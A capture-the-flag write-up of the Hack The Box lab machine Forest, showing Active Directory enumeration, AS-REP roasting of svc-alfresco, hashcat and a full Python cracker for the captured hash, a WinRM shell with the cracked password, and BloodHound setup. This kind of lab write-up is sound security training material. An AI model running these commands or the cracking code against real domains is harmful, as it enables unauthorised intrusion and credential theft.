HTB Forest

$ nmap -T4 -A -p- 10.10.10.161

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 21:04 UTC
Nmap scan report for 10.10.10.161
Host is up (0.023s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-30 21:12:01Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49703/tcp open  msrpc        Microsoft Windows RPC
49917/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/30%Time=5FC55E8D%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/30%OT=53%CT=1%CU=37972%PV=Y%DS=2%DC=T%G=Y%TM=5FC55F
OS:A6%P=x86_64-pc-linux-gnu)SEQ(SP=8A%GCD=1%ISR=93%TI=RD%CI=RI%TS=U)OPS(O1=
OS:M5B4W2L%O2=M5B4W2L%O3=M5B4W2L%O4=M5B4W2L%O5=M5B4W2L%O6=M5B4)WIN(W1=FFFF%
OS:W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=N%T=27%W=FFFF%O=M5B4W
OS:2L%CC=N%Q=)T1(R=Y%DF=N%T=27%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=N%T=27%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T5(R=Y%DF=N%T=27%W=0%S=A%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=N%T=27%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF
OS:=N%T=27%IPL=164%UN=0%RIPL=4801%RID=3F35%RIPCK=I%RUCK=4840%RUD=G)IE(R=N)

Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m09s, median: 6m48s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-11-30T13:14:35-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-11-30T21:14:33
|_  start_date: 2020-11-30T14:30:15

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.06 ms 172.17.0.1
2   0.28 ms 10.10.10.161

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 339.26 seconds

What the scan tells us:

  • Kerberos (88), LDAP (389/636) and global catalog (3268/3269) are open: this is an Active Directory domain controller
  • Domain controller: FOREST.htb.local (10.10.10.161); domain and forest: htb.local
  • OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
  • SMB signing is required, so NTLM relay to SMB on this host is not an option; WinRM (5985) is open, which will be useful once we have credentials
  • The clock skew against the DC has a median of about 7 minutes; Kerberos tolerates 5 by default, so sync the clock (e.g. sudo ntpdate 10.10.10.161) if Kerberos tooling later complains about KRB_AP_ERR_SKEW

To start enumerating the directory we can use JXplorer against 10.10.10.161:389. The DC accepts an anonymous bind, so no credentials are needed, which is a finding in itself.

JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used to search, read and edit any standard LDAP directory, or any directory service with an LDAP or DSML interface.

http://jxplorer.org/

$ sudo apt install jxplorer

Browsing the tree shows:

  • Domain Controller: FOREST.htb.local
  • Computers: EXCH01.htb.local (the name suggests an Exchange server, consistent with the Exchange groups and system mailboxes enumerated below)
  • Employees OU (its users are listed with rpcclient below)
  • Service account: svc-alfresco

We can also use the DC's own DNS service (port 53) to check the authoritative name servers for the domain and the global catalog locator record, to confirm which host is the domain controller.

$dig @10.10.10.161 -t NS htb.local

; <<>> DiG 9.16.8-Debian <<>> @10.10.10.161 -t NS htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55068
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 0df9375bcbfd08ba (echoed)
;; QUESTION SECTION:
;htb.local.			IN	NS

;; ANSWER SECTION:
htb.local.		3600	IN	NS	forest.htb.local.

;; ADDITIONAL SECTION:
forest.htb.local.	3600	IN	A	10.10.10.161

;; Query time: 36 msec
;; SERVER: 10.10.10.161#53(10.10.10.161)
;; WHEN: Wed Dec 02 11:22:35 CET 2020
;; MSG SIZE  rcvd: 87

$dig @10.10.10.161 _gc.htb.local

; <<>> DiG 9.16.8-Debian <<>> @10.10.10.161 _gc.htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42890
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 180b076100c86a7c (echoed)
;; QUESTION SECTION:
;_gc.htb.local.			IN	A

;; AUTHORITY SECTION:
htb.local.		3600	IN	SOA	forest.htb.local. hostmaster.htb.local. 102 900 600 86400 3600

;; Query time: 40 msec
;; SERVER: 10.10.10.161#53(10.10.10.161)
;; WHEN: Wed Dec 02 11:23:33 CET 2020
;; MSG SIZE  rcvd: 117

The A lookup for _gc.htb.local returns NXDOMAIN because AD publishes its locator records as SRV records, not A records: the global catalog is _gc._tcp.htb.local and the DC locator is _ldap._tcp.dc._msdcs.htb.local, so query them with dig -t SRV. The NS answer already shows that forest.htb.local (10.10.10.161) is the authoritative DNS server for the domain, consistent with it being the DC.

Next we check whether MS-RPC accepts a null session, i.e. an anonymous user. If it does, we can follow https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient to continue the enumeration over SAMR without credentials.

rpcclient, part of Samba, is a tool for executing client-side MS-RPC functions.

https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html

$rpcclient -U "" -N 10.10.10.161

rpcclient $>

rpcclient $> enumdomusers

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

rpcclient $> enumdomgroups

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

Interesting users found:

  • user:[Administrator] rid:[0x1f4]
  • user:[Guest] rid:[0x1f5]
  • user:[krbtgt] rid:[0x1f6]
  • user:[DefaultAccount] rid:[0x1f7]
  • user:[sebastien] rid:[0x479]
  • user:[lucinda] rid:[0x47a]
  • user:[svc-alfresco] rid:[0x47b]
  • user:[andy] rid:[0x47e]
  • user:[mark] rid:[0x47f]
  • user:[santi] rid:[0x480]

We can check the user’s information:

rpcclient $> queryuser santi

User Name   :	santi
Full Name   :	Santi Rodriguez
Home Drive  :	
Dir Drive   :	
Profile Path:	
Logon Script:	
Description :	
Workstations:	
Comment     :	
Remote Dial :
Logon Time               :	Thu, 01 Jan 1970 01:00:00 CET
Logoff Time              :	Thu, 01 Jan 1970 01:00:00 CET
Kickoff Time             :	Thu, 14 Sep 30828 04:48:05 CEST
Password last set Time   :	Sat, 21 Sep 2019 01:02:55 CEST
Password can change Time :	Sun, 22 Sep 2019 01:02:55 CEST
Password must change Time:	Thu, 14 Sep 30828 04:48:05 CEST
	unknown_2[0..31]...
user_rid :	0x480
group_rid:	0x201
acb_info :	0x00000210
fields_present:	0x00ffffff
logon_divs:	168
bad_password_count:	0x00000000
logon_count:	0x00000000
padding1[0..7]...
logon_hrs[0..21]...

rpcclient $> queryuser svc-alfresco

User Name   :	svc-alfresco
Full Name   :	svc-alfresco
Home Drive  :	
Dir Drive   :	
Profile Path:	
Logon Script:	
Description :	
Workstations:	
Comment     :	
Remote Dial :
Logon Time               :	Tue, 01 Dec 2020 16:09:09 CET
Logoff Time              :	Thu, 01 Jan 1970 01:00:00 CET
Kickoff Time             :	Thu, 01 Jan 1970 01:00:00 CET
Password last set Time   :	Wed, 02 Dec 2020 11:42:46 CET
Password can change Time :	Thu, 03 Dec 2020 11:42:46 CET
Password must change Time:	Thu, 14 Sep 30828 04:48:05 CEST
	unknown_2[0..31]...
user_rid :	0x47b
group_rid:	0x201
acb_info :	0x00010210
fields_present:	0x00ffffff
logon_divs:	168
bad_password_count:	0x00000000
logon_count:	0x00000007
padding1[0..7]...
logon_hrs[0..21]...

We can also query groups. Domain Admins is RID 0x200:

rpcclient $> querygroup 0x200

Group Name:    Domain Admins     
Description:    Designated administrators of the domain
Group Attribute:7              
Num Members:1

rpcclient $> querygroupmem 0x200

rid:[0x1f4] attr:[0x7]

It has a single member, RID 0x1f4, which is the built-in Administrator account:

rpcclient $> queryuser 0x1f4

User Name   :   Administrator
Full Name   :   Administrator
Home Drive  :   
Dir Drive   :      
Profile Path:      
Logon Script:
Description :   Built-in account for administering the computer/domain
Workstations:
Comment     :
Remote Dial :
Logon Time               :      Mon, 07 Oct 2019 06:57:07 EDT
Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST
Password last set Time   :      Wed, 18 Sep 2019 13:09:08 EDT
Password can change Time :      Thu, 19 Sep 2019 13:09:08 EDT
Password must change Time:      Wed, 30 Oct 2019 13:09:08 EDT
unknown_2[0..31]...
user_rid :      0x1f4
group_rid:      0x201
acb_info :      0x00000010
fields_present: 0x00ffffff
logon_divs:     168
bad_password_count:     0x00000000
logon_count:    0x00000031
padding1[0..7]...
logon_hrs[0..21]...

From the user list we notice svc-alfresco, a service account whose name implies an installation of Alfresco.

Alfresco delivers innovative content management solutions that connect, manage and protect your enterprise's most important information – wherever it lives.

https://www.alfresco.com/

Alfresco's Kerberos configuration guide tells administrators to set up that service account as follows:

Select the Account tab and enable the Do not require Kerberos preauthentication option in the Account Options section.

https://docs.alfresco.com/process-services1.8/tasks/ps-auth-kerberos-ADconfig.html

As described in https://www.tarlogic.com/en/blog/how-to-attack-kerberos/, an account with pre-authentication disabled can be AS-REP roasted: the KDC answers an AS-REQ for that user without any proof of the password.

The rpcclient output already told us the same thing: svc-alfresco's acb_info is 0x00010210, and the 0x00010000 bit is USER_DONT_REQUIRE_PREAUTH (MS-SAMR 2.2.1.12), a bit that santi (0x00000210) and Administrator (0x00000010) do not have. Checking that bit across all users is a quicker and more reliable test than guessing from product documentation.

The AS-REP we get back contains the TGT (encrypted with the krbtgt key, useless to us) and an encrypted part holding the session key, which is encrypted with the user's long-term key. With RC4-HMAC (etype 23) that key is the user's NT hash, MD4 over the UTF-16LE password, so the blob can be brute-forced offline. GetNPUsers.py from impacket sends the AS-REQ and prints the blob in hashcat format; with -usersfile it tries a whole list of names at once, which is how such accounts are found without the rpcclient hint.

$python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:4742618e99e53bcd384e283181a0f1a5$342b2edfe3a1c0e035d1bc842ec85882824d21ac352135f6a9bacfcf8651a2747b26b66cd1666e394a812c6bd0b239d07151175ea64eb7026405ae3fdd522002b0b8fb9bb15f72f3a42905f0b26d4600548e0bee8b6c32656bb0933fa2a0bcbba0da21977e9a33b87bcfdac22bb08bcc8a17ec4586278c2a148642b0e6f9d3f3ceb8384c0f70d3d0c0ae88cf5fe977f4068c9059ee1eb6efa9a94f26a28d364dfe7eb5b1e988323965db849158589e3836c8552489e7a01e7e3c0b377273edd592e5f90c1ba796b4851c7cc2933c7259df561859f7427d3ececc6fb742015fab78bc5c79e55c

We crack it with hashcat mode 18200 (Kerberos 5 AS-REP etype 23) against rockyou. The --show flag only prints entries already cracked into the potfile, so the first run is the same command without it:

$hashcat -m 18200 --force alfresco.hash /usr/share/wordlists/rockyou.txt --show

$krb5asrep$23$svc-alfresco@HTB.LOCAL:4742618e99e53bcd384e283181a0f1a5$342b2edfe3a1c0e035d1bc842ec85882824d21ac352135f6a9bacfcf8651a2747b26b66cd1666e394a812c6bd0b239d07151175ea64eb7026405ae3fdd522002b0b8fb9bb15f72f3a42905f0b26d4600548e0bee8b6c32656bb0933fa2a0bcbba0da21977e9a33b87bcfdac22bb08bcc8a17ec4586278c2a148642b0e6f9d3f3ceb8384c0f70d3d0c0ae88cf5fe977f4068c9059ee1eb6efa9a94f26a28d364dfe7eb5b1e988323965db849158589e3836c8552489e7a01e7e3c0b377273edd592e5f90c1ba796b4851c7cc2933c7259df561859f7427d3ececc6fb742015fab78bc5c79e55c:s3rvice

The password is "s3rvice".
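To see exactly what hashcat checks for each candidate, here is an added example (my own code, not from the original post, impacket or hashcat) that reimplements the etype 23 (RC4-HMAC, RFC 4757) AS-REP check in pure Python: the key is the NT hash (MD4 of the UTF-16LE password), K1 = HMAC-MD5(key, key usage 8 as a little-endian integer, which is how RC4-HMAC maps the AS-REP usage), the 16-byte checksum at the front of the hashcat line recovers K3 = HMAC-MD5(K1, checksum), RC4 with K3 decrypts the rest, and a candidate is right when HMAC-MD5(K1, plaintext) equals the checksum. MD4 and RC4 are written out because OpenSSL 3 builds of Python no longer expose MD4 without the legacy provider. The sample line is constructed with the same routine and a known password so the example runs offline; the principal svc-alfresco@HTB.LOCAL is the page's, all function names and the sample plaintext are assumptions.

```python
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; pure Python because OpenSSL 3 ships MD4 only as a legacy algorithm."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    rounds = (  # (boolean function, additive constant, shift table, message word order)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        r = state[:]
        for fn, const, shifts, order in rounds:
            for j in range(16):
                t = (-j) % 4  # register updated in step j: a, d, c, b, a, ...
                v = (r[t] + fn(r[(t + 1) % 4], r[(t + 2) % 4], r[(t + 3) % 4])
                     + x[order[j]] + const) & MASK
                r[t] = rotl(v, shifts[j % 4])
        state = [(s + v) & MASK for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + PRGA); same routine encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC (etype 23) long-term key is the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


AS_REP_USAGE = 8  # RFC 4120 usage 3 (AS-REP enc-part) is mapped to 8 by RC4-HMAC (RFC 4757)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 encryption: checksum || RC4(K3, confounder || plaintext)."""
    if confounder is None:
        confounder = os.urandom(8)
    k1 = _hmac_md5(key, struct.pack("<I", AS_REP_USAGE))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def verify_asrep(checksum: bytes, edata: bytes, password: str) -> bool:
    """One hashcat -m 18200 candidate check: derive K1, recover K3, decrypt, recompute the HMAC."""
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", AS_REP_USAGE))
    k3 = _hmac_md5(k1, checksum)
    return hmac.compare_digest(_hmac_md5(k1, rc4(k3, edata)), checksum)


def parse_krb5asrep(line: str):
    """Split `$krb5asrep$23$user@REALM:checksum$edata[:password]` (GetNPUsers / hashcat --show)."""
    header, body = line.strip().split(":")[:2]
    _, _, etype, principal = header.split("$")
    checksum_hex, edata_hex = body.split("$")
    return int(etype), principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def forge_krb5asrep(principal: str, password: str, plaintext: bytes, confounder: bytes) -> str:
    """Constructed test line with a known password (not a real KDC response)."""
    blob = rc4_hmac_encrypt(nt_hash(password), plaintext, confounder)
    return f"$krb5asrep$23${principal}:{blob[:16].hex()}${blob[16:].hex()}"


def crack_asrep(line: str, wordlist):
    """Return the first candidate that verifies, or None."""
    etype, _, checksum, edata = parse_krb5asrep(line)
    if etype != 23:
        raise ValueError("only RC4-HMAC (etype 23) AS-REPs are handled here")
    for candidate in wordlist:
        if verify_asrep(checksum, edata, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample: a fake AS-REP enc-part for svc-alfresco keyed with "s3rvice".
    sample = forge_krb5asrep("svc-alfresco@HTB.LOCAL", "s3rvice", b"\x30" * 40, b"\x00" * 8)
    print(crack_asrep(sample, ["password", "Welcome1", "s3rvice"]))  # s3rvice
```

Feeding the $krb5asrep$23$svc-alfresco@HTB.LOCAL:... line captured above to crack_asrep with a wordlist reproduces the crack without hashcat. The nt_hash function is also why the nthash column that secretsdump prints later is all an attacker needs: the same 16 bytes are the Kerberos RC4 key and the NTLM secret, so they can be passed directly instead of cracked.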

Port 5985 is WinRM over HTTP, so we can now use Evil-WinRM with those credentials (whether svc-alfresco is allowed to log on this way is simply tested by trying; on this box it is).

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management, a standard SOAP-based protocol that lets hardware and operating systems from different vendors interoperate. Microsoft included it in its operating systems to make life easier for system administrators.

https://github.com/Hackplayers/evil-winrm

$sudo gem install evil-winrm

Fetching erubi-1.10.0.gem
Fetching rubyntlm-0.6.2.gem
Fetching builder-3.2.4.gem
Fetching little-plugger-1.1.4.gem
Fetching logging-2.3.0.gem
Fetching gyoku-1.3.1.gem
Fetching nori-2.6.0.gem
Fetching gssapi-1.3.1.gem
Fetching winrm-2.3.5.gem
Fetching evil-winrm-2.3.gem
Fetching winrm-fs-1.3.5.gem
Successfully installed builder-3.2.4
Successfully installed erubi-1.10.0
Successfully installed gssapi-1.3.1
Successfully installed gyoku-1.3.1
Successfully installed little-plugger-1.1.4
Successfully installed logging-2.3.0
Successfully installed nori-2.6.0
Successfully installed rubyntlm-0.6.2
Successfully installed winrm-2.3.5
Successfully installed winrm-fs-1.3.5
Happy hacking! :)
Successfully installed evil-winrm-2.3
Parsing documentation for builder-3.2.4
Installing ri documentation for builder-3.2.4
Parsing documentation for erubi-1.10.0
Installing ri documentation for erubi-1.10.0
Parsing documentation for gssapi-1.3.1
Installing ri documentation for gssapi-1.3.1
Parsing documentation for gyoku-1.3.1
Installing ri documentation for gyoku-1.3.1
Parsing documentation for little-plugger-1.1.4
Installing ri documentation for little-plugger-1.1.4
Parsing documentation for logging-2.3.0
Installing ri documentation for logging-2.3.0
Parsing documentation for nori-2.6.0
Installing ri documentation for nori-2.6.0
Parsing documentation for rubyntlm-0.6.2
Installing ri documentation for rubyntlm-0.6.2
Parsing documentation for winrm-2.3.5
Installing ri documentation for winrm-2.3.5
Parsing documentation for winrm-fs-1.3.5
Installing ri documentation for winrm-fs-1.3.5
Parsing documentation for evil-winrm-2.3
Installing ri documentation for evil-winrm-2.3
Done installing documentation for builder, erubi, gssapi, gyoku, little-plugger, logging, nori, rubyntlm, winrm, winrm-fs, evil-winrm after 3 seconds
11 gems installed

$evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

Directory: C:\Users\svc-alfresco\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/23/2019   2:16 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt

e5e4XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Now that we have the user flag we need the root flag.

Since this is a Windows Active Directory environment, the best option is BloodHound: it collects users, groups, sessions and ACLs and shows the paths from the account we hold to high-value targets.

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.

https://github.com/BloodHoundAD/BloodHound

To work, BloodHound needs data collected from the target domain. Collection is done with a collector: SharpHound (run on a Windows host) or bloodhound-python, which queries LDAP, SMB and DNS from our Linux box with the credentials we already have.

https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html

https://bloodhound.readthedocs.io/en/latest/data-collection/bloodhound-py.html

$pip install bloodhound

Collecting bloodhound
  Downloading bloodhound-1.0.5-py3-none-any.whl (65 kB)
     |████████████████████████████████| 65 kB 782 kB/s 
Requirement already satisfied: impacket>=0.9.17 in /usr/lib/python3/dist-packages (from bloodhound) (0.9.21)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from bloodhound) (2.7)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from bloodhound) (0.18.2)
Requirement already satisfied: dnspython in /usr/lib/python3/dist-packages (from bloodhound) (2.0.0)
Requirement already satisfied: pyasn1>=0.4 in /usr/lib/python3/dist-packages (from bloodhound) (0.4.8)
Installing collected packages: bloodhound
Successfully installed bloodhound-1.0.5

$bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -c all -ns 10.10.10.161

INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
INFO: Found 31 users
INFO: Found 75 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
INFO: Done in 00M 33S

$ls *.json

computers.json  domains.json  groups.json  users.json

Now let's install the BloodHound GUI and its Neo4j backend.

$sudo apt install neo4j

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  neo4j
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 103 MB of archives.
After this operation, 117 MB of additional disk space will be used.
Get:1 https://ftp-stud.hs-esslingen.de/Mirrors/archive.parrotsec.org rolling/main amd64 neo4j all 4.0.7-0kali2 [103 MB]
Fetched 103 MB in 11s (9,621 kB/s)
Selecting previously unselected package neo4j.
(Reading database ... 444501 files and directories currently installed.)
Preparing to unpack .../neo4j_4.0.7-0kali2_all.deb ...
Unpacking neo4j (4.0.7-0kali2) ...
Setting up neo4j (4.0.7-0kali2) ...
Scanning application launchers
Removing duplicate launchers from Debian
Launchers are updated

$sudo apt install bloodhound

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  bloodhound
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 63.4 MB of archives.
After this operation, 268 MB of additional disk space will be used.
Get:1 https://ftp.nluug.nl/os/Linux/distr/parrot rolling/main amd64 bloodhound amd64 3.0.5-0kali1 [63.4 MB]
Fetched 63.4 MB in 10s (6,138 kB/s)
Selecting previously unselected package bloodhound.
(Reading database ... 444668 files and directories currently installed.)
Preparing to unpack .../bloodhound_3.0.5-0kali1_amd64.deb ...
Unpacking bloodhound (3.0.5-0kali1) ...
Setting up bloodhound (3.0.5-0kali1) ...
Scanning application launchers
Removing duplicate launchers from Debian
Launchers are updated

$sudo neo4j console

Directories in use:
  home:         /usr/share/neo4j
  config:       /usr/share/neo4j/conf
  logs:         /usr/share/neo4j/logs
